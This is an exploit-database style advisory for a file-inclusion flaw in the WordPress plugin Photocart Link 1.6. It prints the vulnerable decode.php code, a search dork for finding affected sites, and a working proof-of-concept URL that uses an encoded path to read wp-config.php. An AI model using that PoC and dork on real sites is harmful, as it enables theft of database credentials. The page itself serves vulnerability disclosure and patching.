Wordpress Plugin Photocart Link - Local File Inclusion

vendor:

Photocart Link

by:

CrashBandicot @DosPerl

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Photocart Link

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: Yes

Related CWE: N/A

CPE: a:wordpress:photocart_link

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: MSWin32

2016

WordPress Plugin Photocart Link – Local File Inclusion

The Wordpress Plugin Photocart Link is vulnerable to a Local File Inclusion vulnerability. This vulnerability allows an attacker to read sensitive files from the server. The vulnerability exists in the decode.php file, which is used to decode a base64 encoded string. An attacker can use this vulnerability to read the wp-config.php file, which contains the database credentials. To exploit this vulnerability, an attacker can send a crafted request to the decode.php file with the base64 encoded string of the file they want to read.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the plugin.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Photocart Link - Local File Inclusion
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-03-27
# Google Dork : inurl:/wp-content/plugins/photocart-link/
# Vendor Homepage: https://fr.wordpress.org/plugins/photocart-link/
# Tested on: MSWin32
# Version: 1.6

# Vuln file : decode.php

<?php
error_reporting(0);
header("Cache-control: private"); 
$new =  base64_decode($_REQUEST['id']);
header("Content-type: image/jpeg");
header("Content-transfer-encoding: binary\n"); 
header("Content-Disposition: filename=do_not_copy_these_images");
header('Cache-control: no-cache');
@readfile($new);
?>

# PoC : /wp-content/plugins/photocart-link/decode.php?id=Li4vLi4vLi4vd3AtY29uZmlnLnBocA==

# Right click -> Save As -> and Read with Notepad file Saved

# 27/03/2016 - Vendor Informed about Issues